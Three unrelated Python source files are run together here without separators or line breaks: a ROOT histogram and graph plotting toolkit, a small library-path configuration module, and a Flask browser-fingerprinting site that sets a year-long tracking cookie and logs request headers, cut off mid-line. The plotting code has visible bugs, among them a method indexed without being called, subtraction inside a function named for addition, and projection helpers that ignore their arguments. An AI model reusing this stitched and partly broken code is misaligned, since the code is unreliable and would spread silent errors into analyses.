scale_by_binwidth(self, modifYtitle = True): for h in self.l: if h.obj.InheritsFrom('TH1'): if h.obj.GetSumw2() == None: h.obj.Sumw2() if h.obj.GetBinWidth(1) == h.obj.GetBinWidth(2): bw = h.obj.GetBinWidth(1) if modifYtitle == True: newytitle = h.obj.GetYaxis().GetTitle() + ' / {}'.format(bw) h.obj.GetYaxis().SetTitle(newytitle) h.obj.Scale(1./bw) else: for ib in range(1, h.obj.GetNbinsX() + 1): v = h.obj.GetBinContent(ib) v = v / h.obj.GetBinWidth(ib) ve = h.obj.GetBinError(ib) ve = ve / h.obj.GetBinWidth(ib) h.obj.SetBinContent(ib, v) h.obj.SetBinError(ib, ve) if modifYtitle == True: newytitle = h.obj.GetYaxis().GetTitle() + ' / {}'.format('BW') h.obj.GetYaxis().SetTitle(newytitle) else: print('[w] normalize not defined for non histogram...') def normalize_self(self, scale_by_binwidth = True, modTitle = False, scaleE = False, to_max=False): for h in self.l: if h.obj.InheritsFrom('TH3'): print('[w] normalize_self not implemented for TH3') if h.obj.InheritsFrom('TH1'): #if h.GetSumw2() == None: h.obj.Sumw2() if to_max == True: intg = h.obj.GetMaximum() else: if h.obj.InheritsFrom('TH2') or h.obj.InheritsFrom('TF2'): intg = h.obj.Integral(1, h.obj.GetNbinsX(), 1, h.obj.GetNbinsY()) else: intg = h.obj.Integral(1, h.obj.GetNbinsX()) if h.obj.InheritsFrom('TH2') or h.obj.InheritsFrom('TF2'): if scale_by_binwidth: print('[w] bin width for 2D histogram set to 1.') bw = 1. 
else: bw = h.obj.GetBinWidth(1) if intg > 0: if scale_by_binwidth: h.obj.Scale(1./intg/bw) if scaleE == True: scale_errors(h.obj, 1./intg/bw) print('[i] scale by:',1./intg/bw) else: h.obj.Scale(1./intg) if scaleE == True: scale_errors(h.obj, 1./intg) print('[i] scale by:',1./intg) if modTitle == True: ytitle = h.obj.GetYaxis().GetTitle() ytitle += ' ({0})'.format(bw) h.obj.GetYaxis().SetTitle(ytitle) else: print('[w] normalize not defined for non histogram...') def normalize_to_index(self, idx, scale_by_binwidth = True, modTitle = False, scaleE = False, to_max=False): intg = 0 try: if to_max == True: intg = self.l[idx].obj.GetMaximum() else: intg = self.l[idx].obj.Integral() except: print('[w] normalization to',idx,'failed') return print('[i] normalization defined by index=',idx,'intg=',intg) for h in self.l: if h.obj.InheritsFrom('TH1'): #if h.GetSumw2() == None: h.obj.Sumw2() bw = h.obj.GetBinWidth(1) if intg > 0: if scale_by_binwidth: h.obj.Scale(1./intg/bw) if scaleE == True: scale_errors(h.obj, 1./intg/bw) print('[i] scale by:',1./intg/bw) else: h.obj.Scale(1./intg) if scaleE == True: scale_errors(h.obj, 1./intg) print('[i] scale by:',1./intg) if modTitle == True: ytitle = h.obj.GetYaxis().GetTitle() ytitle += ' ({0})'.format(bw) h.obj.GetYaxis().SetTitle(ytitle) else: print('[w] normalize not defined for non histogram...') def write_to_file(self, fname=None, opt='RECREATE', name_mod=''): if fname==None: fname = './' + pyutils.to_file_name(self.name) + '.root' if check_andor_make_output_dir(fname, isfilename=True) is False: print('[e] unable to create/access output dir for: ', fname, file=sys.stderr) return try: f = ROOT.TFile(fname, opt) f.cd() except: print('[e] unable to open file:',fname, file=sys.stderr) return for i,h in enumerate(self.l): newname = h.obj.GetName() if 'mod:' in name_mod or 'modn:' in name_mod: smod = name_mod.replace('mod:', '') smod = name_mod.replace('modn:', '') if len(smod) > 0: newname = self.name + '-{}-'.format(i) + smod else: if 'modn:' in name_mod: newname = 'o_{}'.format(i) else: newname = self.name + '-{}'.format(i) else: if len(name_mod)>0: if ':' == name_mod[-1]: newname = name_mod.replace(':','') + '_{}'.format(i) else: newname = h.obj.GetName() + name_mod if h.dopt.no_legend: newname = newname + '_noleg' if h.dopt.hidden: newname = newname + '_hidden' h.obj.Write(newname) # except: # print >> sys.stderr, '[e] unable to write object:',h.obj.GetName() try: f.Close() print('[i] written to file',fname) except: print('[e] writing to file {0} failed'.format(fname), file=sys.stderr) def ratio_to(self, ito = 0, opt='HIST'): hdenom = self.l[ito].obj hret = dlist('{}-ratio-to-index-{}'.format(self.name, ito)) for i in range(len(self.l)): if i == ito: continue h = self.l[i].obj hlr = make_ratio(h, hdenom) hret.add(hlr.last().obj, hlr.last().obj.GetTitle(), opt) return hret def ratio_to_graph(self, ito = 0, opt='p'): hdenom = self.l[ito].obj hret = dlist('{}-ratio-to-index-{}'.format(self.name, ito)) for i in range(len(self.l)): if i == ito: continue h = self.l[i].obj hlr = ROOT.TGraphAsymmErrors(h, hdenom) hret.add(hlr, h.GetTitle()+'_div_'+hdenom.GetTitle(), opt) return hret def ratio_to_href(self, hdenom, opt='HIST'): hret = dlist('{}-ratio-to-href-{}'.format(self.name, hdenom.GetName())) for i in range(len(self.l)): h = self.l[i].obj hlr = make_ratio(h, hdenom) hret.add(hlr.last().obj, hlr.last().obj.GetTitle(), opt) return hret def reset_titles(self, stitles): for h in self.l: i = self.l.index(h) if i < len(stitles): h.obj.SetTitle(stitles[i]) def 
reset_user_titles(self, stitles): for h in self.l: i = self.l.index(h) if i < len(stitles): h.user_title = stitles[i] def draw_comment(self, comment = '', font_size=None, x1 = 0.0, y1 = 0.9, x2 = 0.99, y2 = 0.99, rotation=0.0): du.draw_comment(comment, font_size, x1, y1, x2, y2, rotation) def sum(self, scales=None): reth = None isummed = 0 for i,h in enumerate(self.l): if h.dopt.hidden or h.obj.GetTitle() == 'fake': continue if isummed == 0: reth = draw_object(h.obj, self.name + '-sum', h.name + '-sum') if scales != None: reth.obj.Scale(scales[i]) isummed += 1 continue scale = 1. if scales != None: scale = scales[i] if reth.obj.InheritsFrom('TGraph') or h.obj.InheritsFrom('TGraph'): add_graphs(reth.obj, h.obj) isummed += 1 else: reth.obj.Add(h.obj, scale) isummed += 1 return reth def set_name_as_filename(self, name): self.name = pyutils.to_file_name(name) def pdf(self): self.tcanvas.Print(pyutils.to_file_name(self.name)+'.pdf','.pdf') if dlist.enable_eps: self.tcanvas.Print(pyutils.to_file_name(self.name)+'.eps','.eps') def pdf_to_file(self, fname): self.tcanvas.Print(fname,'pdf') def png(self): self.tcanvas.Print(pyutils.to_file_name(self.name)+'.png','.png') def add_graphs(o1, o2, w=1.): print('[w] do not trust add_graphs with errors...') if o1.InheritsFrom('TGraph') and o2.InheritsFrom('TGraph'): x = o1.GetX() y = o1.GetY() for i in range(o1.GetN()): if o1.InheritsFrom('TGraphErrors'): xe = o1.GetEX()[i] ye = o1.GetEY()[i] fractionE = ye / y[i] if x[i] == o2.GetX()[i]: y[i] = y[i] - o2.GetY[i] print('simple substr..') else: y[i] = y[i] + w * o2.Eval(x[i], 0, 'S') if o1.InheritsFrom('TGraphErrors'): ye = y[i] * fractionE o1.SetPoint(i, x[i], y[i]) if o1.InheritsFrom('TGraphErrors'): o1.SetPointError(i, xe, ye) def divide_graphs(o1, o2, w=1.): print('[w] do not trust add_graphs with errors...') if o1.InheritsFrom('TGraph') and o2.InheritsFrom('TGraph'): x = o1.GetX() y = o1.GetY() for i in range(o1.GetN()): try: y[i] = y[i] / (w * o2.Eval(x[i], 0, 'S')) except: y[i] = 0. try: o1.GetEY()[i] = o1.GetEY()[i] / (w * o2.Eval(x[i], 0, 'S')) except: pass class ListStorage: def __init__(self, name = None): if name == None: name = 'global_debug_list_of_lists' self.name = name self.name = tu.unique_name(name) tu.gList.append(self) self.lists = [] self.tcanvas = None self.lx1 = None self.lx2 = None self.ly1 = None self.ly2 = None self.legend_font_scale = 1. 
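    # Typical use of this container -- a minimal, hypothetical sketch (the
    # histogram 'h', file and list names are placeholders, not part of this
    # module); gDL below is the module-level ListStorage instance:
    #
    #     gDL.add_to_list('spectra', h, 'data', 'p +k2')
    #     gDL.add_from_file('spectra', 'h_pt', 'out.root', 'MC', 'hist +k4')
    #     gDL.draw_all(logy=True, legtitle='p_{T} spectra')
    #     gDL.pdf()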
def __getitem__(self, i): return self.lists[i] def reset_axis_titles(self, titlex=None, titley=None, titlez=None): for hl in self.lists: hl.reset_axis_titles(titlex, titley, titlez) def add_to_list(self, lname, obj, title, dopt): hl = self.get(lname) hl.add(obj, title, dopt) def add_from_file(self, lname, hname, fname, htitle, dopt): hl = self.get(lname) return hl.add_from_file(hname, fname, htitle, dopt) def get(self, lname): for l in self.lists: if lname == l.name: return l retl = dlist(lname) self.lists.append(retl) return self.get(lname) def get_list(self, lname): return self.get(lname) def zoom_axis(self, which, xmin, xmax): for l in self.lists: l.zoom_axis(which, xmin, xmax) self.update() def append(self, hl): self.lists.append(hl) def prepend(self, hl): self.lists.insert(0, hl) def legend_position(self, x1=None, y1=None, x2=None, y2=None): self.lx1 = x1 self.lx2 = x2 self.ly1 = y1 self.ly2 = y2 def resize_window(self, w, h): self.tcanvas.SetWindowSize(w, h) # + (w - self.tcanvas.GetWw()), h + (h - self.tcanvas.GetWh())); self.tcanvas.SetWindowSize(w + (w - self.tcanvas.GetWw()), h + (h - self.tcanvas.GetWh())); self.tcanvas.Update() def fix_x_range(self, xmin, xmax): for l in self.lists: l.fix_x_range(xmin, xmax) #print l def draw_all(self, option='', miny=None, maxy=None, logy=False, colopt='', legtitle='', orient=0, condense=False, draw_legend=True): legoption = 'brNDC' if len(self.lists) <= 0: return if condense == False: self.tcanvas = du.make_canvas_grid(len(self.lists), None, self.name+'-canvas', self.name, orient=orient) else: tmptc = ROOT.TCanvas('tc-'+self.name, 'tc-'+self.name) self.tcanvas = pcanvas.pcanvas(tmptc, len(self.lists)) legoption = 'br' for i,l in enumerate(self.lists): if legtitle == '': slegtitle = l.title else: slegtitle = legtitle if legtitle == None: slegtitle = '' if ';single_pad' in legtitle: slegtitle = legtitle slegtitle = slegtitle.replace(';single_pad', '') if i > 0: slegtitle = ' ' self.tcanvas.cd(i+1) if condense == True: l.set_font(43, 1.4) if condense == False: l.draw(logy=logy, option=option, miny=miny, maxy=maxy, colopt=colopt) else: l.draw(logy=logy, option=option, miny=miny, maxy=maxy, colopt=colopt, adjust_pad=False) if draw_legend: if self.lx1 != None: legend = l.self_legend(1, slegtitle, self.lx1, self.ly1, self.lx2, self.ly2, tx_size=self.legend_font_scale * 0.04, option=legoption) else: legend = l.self_legend(ncols=1, title=slegtitle, tx_size=self.legend_font_scale * 0.04, option=legoption) else: if legtitle == 'self': l.draw_comment(l.title, 0.05, 0, 0.9, 1., 1.) 
l.update(logy=logy) self.adjust_pads() def draw_mpad(self, miny=None, maxy=None, logy=False, legtitle = []): ncol = 1 nrow = 1 while ncol * nrow < len(self.lists): if ncol * nrow < len(self.lists): ncol = ncol + 1 if ncol * nrow < len(self.lists): nrow = nrow + 1 remap = [] for n in range(ncol * nrow): if n < ncol: remap.append(n*2+1) else: remap.append((n-ncol)*2) print(remap) import canvas2 tcname = '{}-canvas-condensed'.format(self.name) self.tcanvas = canvas2.CanvasSplit(tcname, ncol, nrow, None, int(850*1.2), int(600*1.2)) for i in range(len(self.lists)): hl = self.lists[i] hl.set_font(42) tp = self.tcanvas.cd(remap[i]) self.tcanvas.adjust_axis(hl, scaleTSize=1.2, scaleLSize=1.2) hl.draw(logy=True, miny=miny,maxy=maxy,adjust_pad=False, adjust_axis_attributes=False) tp.SetLogy(logy) xf = self.tcanvas.get_axis_factor(0) yf = self.tcanvas.get_axis_factor(1) #leg = hl.self_legend(1, '', x1=10, x2=18, y1=1e-6, y2=5.e-4, option='br') leg = hl.self_legend(1, '', self.lx1, self.ly1, self.lx2, self.ly2, option='br') for i,st in enumerate(legtitle): if i == 0: continue leg.AddEntry(0, st, '') pad_width = ROOT.gPad.XtoPixel(ROOT.gPad.GetX2()) pad_height = ROOT.gPad.YtoPixel(ROOT.gPad.GetY1()) #print pad_width, pad_height pxlsize = 16. if pad_width < pad_height: #charheight = textsize*pad_width; textsize = pxlsize / pad_width else: #charheight = textsize*pad_height; textsize = pxlsize / pad_height fsize = 1 #print xf, yf, xf * yf, fsize, textsize leg.SetTextSize(textsize) leg.Draw() self.tcanvas.tc.Update() def adjust_pads(self): for i,hl in enumerate(self.lists): hl.adjust_to_pad(self.lists[0].pad) def pdf(self): self.tcanvas.Print(pyutils.to_file_name(self.name)+'.pdf','.pdf') def png(self): self.tcanvas.Print(pyutils.to_file_name(self.name)+'.png','.png') def write_all(self, mod='', opt='RECREATE'): for i,hl in enumerate(self.lists): hl.write_to_file(opt=opt, name_mod = mod) def update(self, logy=False): for l in self.lists: l.update(logy=logy) def get_pads(self): self.pads = [] for ip in [ self.tcanvas.cd(i+1) for i in range(len(self.lists)) ]: self.pads.append(ip) return self.pads def set_grid_x(self, what=True): for p in self.get_pads(): p.SetGridx(what) p.Update() def set_grid_y(self, what=True): for p in self.get_pads(): p.SetGridy(what) p.Update() def set_log_axis(self, axis='', what=True): for p in self.get_pads(): if 'x' in axis: p.SetLogx(what) if 'y' in axis: p.SetLogy(what) if 'z' in axis: p.SetLogz(what) p.Update() gDebugLists = ListStorage() gDL = gDebugLists def load_tlist(tlist, pattern=None, names_not_titles=True, draw_opt='HIST', hl = None): listname = tlist.GetName() if hl == None: hl = ol(listname) for obj in tlist: to_load=False if pattern: if pattern in obj.GetName(): to_load=True else: to_load=False else: to_load=True if to_load: if names_not_titles == True: newname = "{}:{}".format(tlist.GetName(), obj.GetName()) hl.add (obj, newname, draw_opt) #hl.addh (obj, newname, draw_opt) #hl.addgr(obj, newname) #hl.addf (obj, newname, 'L') else: hl.add (obj, draw_opt=draw_opt) #hl.addh(obj, draw_opt=draw_opt) #hl.addgr(obj) #hl.addf(obj, None, 'L') #print '[i] add :',obj.GetName() else: #print '[i] ignore:',obj.GetName() pass return hl def load_file(fname='', pattern=None, names_not_titles=True, draw_opt='', xmin=None, xmax=None): if not fname: return None fin = None try: fin = ROOT.TFile(fname) except: print('[e] root file open failed for',fname, file=sys.stderr) return None listname = fname.replace('/','_')+'-'+'-hlist' if pattern: listname = 
fname.replace('/','_')+'-'+pattern.replace(' ','-')+'-hlist' hl = dlist(listname) if xmin!=None and xmax!=None: hl = make_list(listname, xmin, xmax) lkeys = fin.GetListOfKeys() for key in lkeys: if key.GetClassName() == "TList": load_tlist(key.ReadObj(), pattern, names_not_titles, draw_opt, hl) to_load=False if pattern: if pattern in key.GetName(): to_load=True else: to_load=False else: to_load=True if to_load: obj = key.ReadObj() if names_not_titles: hl.add(obj, obj.GetName(), draw_opt) hl.last().obj.SetName(key.GetName()) else: hl.add(obj, '', draw_opt=draw_opt) hl.last().obj.SetName(key.GetName()) #print '[i] add :',key.GetName() else: #print '[i] ignore:',key.GetName() pass fin.Close() if len(hl.l) <= 0: print('[w] No entries in the list!', file=sys.stderr) return hl def show_file(fname='', logy=False, pattern=None, draw_opt='p', names_not_titles=True, xmin=None, xmax=None, ymin=None, ymax=None): tu.setup_basic_root() #ROOT.gROOT.Reset() #ROOT.gStyle.SetScreenFactor(1) hl = load_file(fname, pattern, names_not_titles, draw_opt, xmin, xmax) hl.pattern = pattern if not hl.has2D(): hl.make_canvas() hl.tcanvas.Divide(2,1) hl.tcanvas.cd(1) if 'self' in draw_opt: hl.draw(draw_opt, None, None, logy) else: #hl.colorize() #hl.markerize() #hl.lineize() if xmin!=None and xmax!=None: hl.zoom_axis(0, xmin, xmax) hl.draw(draw_opt, ymin, ymax, logy) if logy: ROOT.gPad.SetLogy() if tu.is_arg_set('--logx'): ROOT.gPad.SetLogx() exs = ' '.join(sys.argv) exs = exs.replace(sys.argv[0], 'show_file:') fnsize = float(1.5/len(exs)) du.draw_comment(exs, fnsize, 0, 0.9, 1., 1.) # ::draw_comment was ol method at some point hl.tcanvas.cd(2) #hl.draw_legend(1,fname+'[{0}]'.format(pattern)) hl.self_legend(1, fname + ' [ {0} ]'.format(pattern), 0.0, 0.0, 1, 1) hl.tcanvas.Update() #the one below is better (?) #ROOT.gPad.Update() return hl def make_ratio(h1, h2): hl = dlist('ratio {} div {}'.format(h1.GetName(), h2.GetName()).replace(' ', '_')) newname = '{}_div_{}'.format(h1.GetName(), h2.GetName()) newtitle = '{} / {}'.format(h1.GetTitle(), h2.GetTitle()) hr = h1.Clone(newname) hr.SetTitle(newtitle) if h1.InheritsFrom('TGraph') and h2.InheritsFrom('TGraph'): divide_graphs(hr, h2) else: hr.SetDirectory(0) hr.Divide(h2) hl.add(hr, newtitle, 'p') hl.reset_axis_titles(None, newtitle) return hl def make_sum(h1, h2, w=1.): hl = dlist('sum {} and {} w{}'.format(h1.GetName(), h2.GetName(), w).replace(' ', '_')) newname = '{}_and_{}_w={}'.format(h1.GetName(), h2.GetName(), w) newtitle = 'sum {} + {} w={}'.format(h1.GetTitle(), h2.GetTitle(), w) hr = h1.Clone(newname) hr.SetTitle(newtitle) if h1.InheritsFrom('TGraph') and h2.InheritsFrom('TGraph'): add_graphs(hr, h2, w) else: hr.SetDirectory(0) hr.Add(h2, w) hl.add(hr, newtitle, 'p') hl.reset_axis_titles(None, newtitle) return hl def scale_errors(h, val): for i in range(1, h.GetNbinsX()): err = h.GetBinError(i) h.SetBinError(i, err * val) def reset_errors(h, herr, relative=False): for i in range(1, h.GetNbinsX()): if h.GetBinContent(i) == 0 and h.GetBinError(i) == 0: continue err = herr.GetBinError(i) if relative == True: if herr.GetBinContent(i) != 0: relat = h.GetBinContent(i) / herr.GetBinContent(i) else: relat = 1. 
err = err * relat h.SetBinError(i, err) def reset_points(h, xmin, xmax, val=0.0, err=0.0): for ib in range(1, h.GetNbinsX()+1): if h.GetBinCenter(ib) > xmin and h.GetBinCenter(ib) < xmax: h.SetBinContent(ib, val) h.SetBinError(ib, err) #yields above threshold - bin-by-bin def yats(olin): oret = dlist(olin.name + '_yat') oret.copy(olin) for idx,ho in enumerate(oret.l): h = ho.obj h.Reset() hin = olin.l[idx].obj for ib in range(1, hin.GetNbinsX()): maxbin = hin.GetNbinsX() yat = hin.Integral(ib, maxbin, "width") h.SetBinContent(ib, yat) #oret.lopts[idx] = olin.lopts[idx] # not needed - within copy return oret def fractional_yats(olin, refidx=-1): oret = dlist(olin.name + '_fyat') oret.copy(olin) integRef = 1. if refidx >= 0: hin = olin.l[refidx].obj maxbin = hin.GetNbinsX() integRef = hin.Integral(1, maxbin, "width") for idx,ho in enumerate(oret.l): h = ho.obj h.Reset() hin = olin.l[idx].obj maxbin = hin.GetNbinsX() integ = hin.Integral(1, maxbin, "width") if integ <= 0: print("[w] integral ? ",integ) integ = -1. for ib in range(1, maxbin): if refidx >= 0: yat = hin.Integral(ib, maxbin, "width") / integRef else: yat = hin.Integral(ib, maxbin, "width") / integ h.SetBinContent(ib, yat) #oret.lopts[idx] = olin.lopts[idx] # not needed - within copy return oret def rejs(olin): oret = ol(olin.name + '_rej') oret.copy(olin) for h in oret.l: h.Reset() idx = oret.l.index(h) hin = olin.l[idx] for ib in range(1, hin.GetNbinsX()): maxbin = hin.GetNbinsX() yat = hin.Integral(ib , maxbin) yatp1 = hin.Integral(1 , maxbin) h.SetBinContent(ib, yat/yatp1) return oret def filter_single_entries_h(h, href=None, thr=10): if href == None: href = h for ib in range(1, h.GetNbinsX()+1): if href.GetBinContent(ib) < thr: h.SetBinContent(ib, 0) h.SetBinError(ib, 0) def filter_single_entries_h2d(h, href=None, thr=10): if href == None: href = h for ib in range(1, h.GetNbinsX()+1): for iby in range(1, h.GetNbinsY()+1): if href.GetBinContent(ib, iby) < thr: h.SetBinContent(ib, iby, 0) h.SetBinError(ib, iby, 0) def filter_single_entries(hl, hlref, thr=10): for ih in range(len(hl.l)): h = hl.l[ih].obj href = hlref.l[ih].obj for ib in range(h.GetNbinsX()+1): if href.GetBinContent(ib) < thr: h.SetBinContent(ib, 0) h.SetBinError(ib, 0) def filter_single_entries_2d(hl, hlref, thr=10): for ih in range(len(hl.l)): h = hl.l[ih].obj href = hlref.l[ih].obj for ib in range(1, h.GetNbinsX()+1): for iby in range(1, h.GetNbinsY()+1): if href.GetBinContent(ib, iby) < thr: h.SetBinContent(ib, iby, 0) h.SetBinError(ib, iby, 0) def get_projection_axis(hname, h2d, axis, ixmin=0, ixmax=105): if axis == 1: ixminb = h2d.GetXaxis().FindBin(ixmin) ixmaxb = h2d.GetXaxis().FindBin(ixmax) if ixmaxb > h2d.GetXaxis().GetNbins(): imaxb = h2d.GetXaxis().GetNbins() hproj = h2d.ProjectionY(hname, ixminb, ixmaxb) else: ixminb = h2d.GetYaxis().FindBin(ixmin) ixmaxb = h2d.GetYaxis().FindBin(ixmax) if ixmaxb > h2d.GetYaxis().GetNbins(): imaxb = h2d.GetYaxis().GetNbins() hproj = h2d.ProjectionX(hname, ixminb, ixmaxb) return hproj def get_projectionY(hname, h2d, ixmin=0, ixmax=105): return get_projection_axis(hname, h2d, 1, ixmin=0, ixmax=105) def get_projections_axis_bins(hname, fname, htitle, opt, axis, pTs): h2d = tu.get_object_from_file(hname, fname, htitle + '2d') if h2d == None: print('[i] unable to get:',hname,'from:',fname) return None pTmin = pTs[0][0] pTmax = pTs[len(pTs)-1][1] hlname = 'projections-{}-{}-{}-{}-{}'.format(hname, fname, htitle, pTmin, pTmax) hl = dlist(hname+htitle) for i in range(len(pTs)): pTmin = pTs[i][0] pTmax = pTs[i][1] htitlepy = 
'{} [{}-{}]'.format(htitle, pTmin, pTmax) if axis == 1: hn = '{}-py-{}-{}'.format(hname, pTmin, pTmax) else: hn = '{}-px-{}-{}'.format(hname, pTmin, pTmax) hp = get_projection_axis(hn, h2d, axis, pTmin, pTmax) hp.Sumw2() hl.append(hp, htitlepy, 'P L HIST') return hl def get_projections_axis(hname, fname, htitle, pTmin, pTmax, step, opt='P L HIST', axis = 1, pTs=None): h2d = tu.get_object_from_file(hname, fname, htitle + '2d') if h2d == None: print('[i] unable to get:',hname,'from:',fname) return None hlname = 'projections-{}-{}-{}-{}-{}-{}'.format(hname, fname, htitle, pTmin, pTmax, step) hl = dlist(hname+htitle) pT = pTmin while pT + step < pTmax: if pTs != None: pTs.append(pT) htitlepy = '{} [{}-{}]'.format(htitle, pT, pT + step) if axis == 1: hn = '{}-py-{}-{}'.format(hname, pT, pT + step) else: hn = '{}-px-{}-{}'.format(hname, pT, pT + step) hp = get_projection_axis(hn, h2d, axis, pT, pT + step) hp.Sumw2() hl.append(hp, htitlepy, 'P L HIST') pT = pT + step return hl def get_projections_axis_lowcut(hname, fname, htitle, pTmin, pTmax, step, opt='P L HIST', axis = 1, pTs=None): h2d = tu.get_object_from_file(hname, fname, htitle + '2d') if h2d == None: print('[i] unable to get:',hname,'from:',fname) return None hlname = 'projections-{}-{}-{}-{}-{}-{}'.format(hname, fname, htitle, pTmin, pTmax, step) hl = dlist(hname+htitle) pT = pTmin Amax = h2d.GetXaxis().GetXmax() if axis == 0: Amax = h2d.GetYaxis().GetXmax() while pT + step <= pTmax: if pTs != None: pTs.append(pT) htitlepy = '{} [{}-{}]'.format(htitle, pT, Amax) if axis == 1: hn = '{}-py-{}-{}'.format(hname, pT, Amax) else: hn = '{}-px-{}-{}'.format(hname, pT, Amax) hp = get_projection_axis(hn, h2d, axis, pT, Amax) hp.Sumw2() hl.append(hp, htitlepy, 'P L HIST') pT = pT + step return hl def get_projections(hname, fname, htitle, pTmin, pTmax, step, opt='P L HIST', pTs=None): return get_projections_axis(hname, fname, htitle, pTmin, pTmax, step, opt, 1, pTs) def get_projectionsY(hname, fname, htitle, pTmin, pTmax, step, opt='P L HIST', pTs=None): return get_projections_axis(hname, fname, htitle, pTmin, pTmax, step, opt, 1, pTs) def get_projectionsX(hname, fname, htitle, pTmin, pTmax, step, opt='P L HIST', pTs=None): return get_projections_axis(hname, fname, htitle, pTmin, pTmax, step, opt, 0, pTs) def make_graph_xy(name, x, y, xe = [], ye = []): xf = [] yf = [] xef = [] yef = [] for v in x: xf.append(float(v)) for v in y: yf.append(float(v)) xa = array('f', xf) ya = array('f', yf) if len(xe) == 0: for ix in x: xef.append(0) else: for v in xe: xef.append(float(v)) xae = array('f', xef) if len(ye) == 0: for iy in y: yef.append(0) else: for v in ye: yef.append(float(v)) yae = array('f', yef) if len(ye) == 0 and len(xe) == 0: gr = ROOT.TGraph(len(xf), xa, ya) else: gr = ROOT.TGraphErrors(len(xf), xa, ya, xae, yae) gr.SetName(name) return gr def make_graph(name, data): x = [] y = [] xe = [] ye = [] for ix in data: x.append(ix[0]) y.append(ix[1]) try: xe.append(ix[2]) except: pass try: ye.append(ix[3]) except: pass return make_graph_xy(name, x, y, xe, ye) def make_graph_ae_xy(name, x, y, xlow = [], xhigh = [], ylow = [], yhigh = []): xf = array('f', x) yf = array('f', y) zs = [] for i in range(len(x)): zs.append(0) if len(xlow) > 0: xflow = array('f', xlow) else: xflow = array('f', zs) if len(xhigh) > 0: xfhigh = array('f', xhigh) else: xfhigh = array('f', zs) if len(ylow) > 0: yflow = array('f', ylow) else: yflow = array('f', zs) if len(yhigh) > 0: yfhigh = array('f', yhigh) else: yfhigh = array('f', zs) #print len(x), xf, yf, xflow, xfhigh, 
yflow, yfhigh gr = ROOT.TGraphAsymmErrors(len(x), xf, yf, xflow, xfhigh, yflow, yfhigh) gr.SetName(name) return gr def norm_error_graph(name, x, width, y, ymin, ymax=-1): ax = [x - width/2.] xl = [width/2.] xh = [width/2.] ay = [y] yl = [ymin] yh = [ymax] if ymax < 0: yh = [ymin] return make_graph_ae_xy(name, ax, ay, xl, xh, yl, yh) def make_list(name, xmin, xmax): hl = dlist(name) gr = ROOT.TGraph(2) gr.SetPoint(0, xmin, 0) gr.SetPoint(1, xmax, 0) hl.add(gr, 'fake', 'noleg hidden p') return hl def h_to_graph(h, drop_zero_entries=False, xerror=False, transpose=False): x = [] y = [] ex = [] ey = [] for ib in range(1,h.GetNbinsX()+1): if drop_zero_entries: if type(drop_zero_entries) is bool: ymin = 0.0 if (h.GetBinContent(ib)*h.GetBinContent(ib)) <= ymin: print('dropped bin bool', ib, h.GetBinContent(ib), ymin) continue else: ymin = drop_zero_entries if h.GetBinContent(ib) <= ymin: print('dropped bin', ib, h.GetBinContent(ib), ymin) continue x.append(h.GetBinCenter(ib)) y.append(h.GetBinContent(ib)) if xerror == True: ex.append(h.GetBinCenter(ib) - h.GetBinLowEdge(ib)) else: ex.append(0) ey.append(h.GetBinError(ib)) name = h.GetName() + '_to_graph' title = h.GetTitle() if transpose: gr = make_graph_xy(name, y, x, ey, ex) else: gr = make_graph_xy(name, x, y, ex, ey) gr.SetTitle(title) return gr def scale_graph_errors(gr, axis, scale=1.): if gr.InheritsFrom('TGraphErrors'): for i in range(gr.GetN()): if axis == 0: gr.GetEX()[i] = gr.GetEX()[i] * scale else: gr.GetEY()[i] = gr.GetEY()[i] * scale if gr.InheritsFrom('TGraphAsymmErrors'): for i in range(gr.GetN()): if axis == 0: gr.GetEXlow()[i] = gr.GetEXlow()[i] * scale gr.GetEXhigh()[i] = gr.GetEXhigh()[i] * scale else: gr.GetEYlow()[i] = gr.GetEYlow()[i] * scale gr.GetEYhigh()[i] = gr.GetEYhigh()[i] * scale def scale_by_binwidth(h, modifYtitle = True): if h.InheritsFrom('TH1'): if h.GetSumw2() == None: h.Sumw2() if h.GetBinWidth(1) == h.GetBinWidth(2): bw = h.GetBinWidth(1) if modifYtitle == True: newytitle = h.GetYaxis().GetTitle() + ' / {}'.format(bw) h.GetYaxis().SetTitle(newytitle) h.Scale(1./bw) else: for ib in range(1, h.GetNbinsX() + 1): v = h.GetBinContent(ib) v = v / h.GetBinWidth(ib) ve = h.GetBinError(ib) ve = ve / h.GetBinWidth(ib) h.SetBinContent(ib, v) h.SetBinError(ib, ve) if modifYtitle == True: newytitle = h.GetYaxis().GetTitle() + ' / {}'.format('BW') h.GetYaxis().SetTitle(newytitle) else: print('[w] normalize not defined for non histogram...') 10-100 # coding=utf-8 import os # 获取上级目录的绝对路径 last_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "..")) # 获取lib LIB_DIR = os.path.join(last_dir, u"lib") LINUX_X64_DIR = os.path.join(LIB_DIR, u"linux_x64") WINDOWS_DIR = os.path.join(LIB_DIR, u"windows") WIN32_DIR = os.path.join(LIB_DIR, u"win32") WIN64_DIR = os.path.join(LIB_DIR, u"win64") def test(): print(LIB_DIR) print(LINUX_X64_DIR) print(WIN32_DIR) if __name__ == '__main__': test() import base64 import json import os from datetime import datetime, timedelta from hashlib import sha256 import flask from . import app from . import database from . 
import util USER_ID_KEY = 'user-id' @app.route('/') def home(): return flask.render_template( 'home.html', readonly_mode=util.readonly_mode() ) @app.route('/results') def results(): initial_request_stats, initial_request_total, initial_request_unique =\ database.get_stats(database.InitialRequestFingerprint) js_stats, js_total, js_unique =\ database.get_stats(database.JavaScriptFingerprint) return flask.render_template( 'results.html', initial_request_stats=initial_request_stats, initial_request_total=initial_request_total, initial_request_unique=initial_request_unique, js_stats=js_stats, js_total=js_total, js_unique=js_unique, format_database_column_name=util.format_database_column_name, get_percentage=util.get_percentage ) @app.route('/fingerprint') def fingerprint(): collection_datetime = datetime.utcnow() response = flask.make_response() user_id = flask.request.cookies.get(USER_ID_KEY) if user_id is None: user_id = new_user_id() max_age = 365 * 24 * 3600 expires = datetime.utcnow() + timedelta(days=365) if not util.readonly_mode(): response.set_cookie( USER_ID_KEY, user_id, max_age=max_age, expires=expires ) headers = request_headers( 'User-Agent', 'Accept', 'Accept-Language', 'Accept-Encoding', 'DNT', 'Upgrade-Insecure-Requests' ) results = database.add_fingerprint( database.InitialRequestFingerprint, user_id, collection_datetime, headers ) response.set_data( flask.render_template( 'fingerprint.html', **results ) ) return response def new_user_id(): user_id = base64.b64encode(os.urandom(18)).decode() assert not database.cookie_id_already_exists(user_id), \ f"cookie ID '{user_id}' already exists (this should never happen)" return user_id @app.route('/fingerprint-js', methods=['POST']) def fingerprint_js(): collection_datetime = datetime.utcnow() user_id = 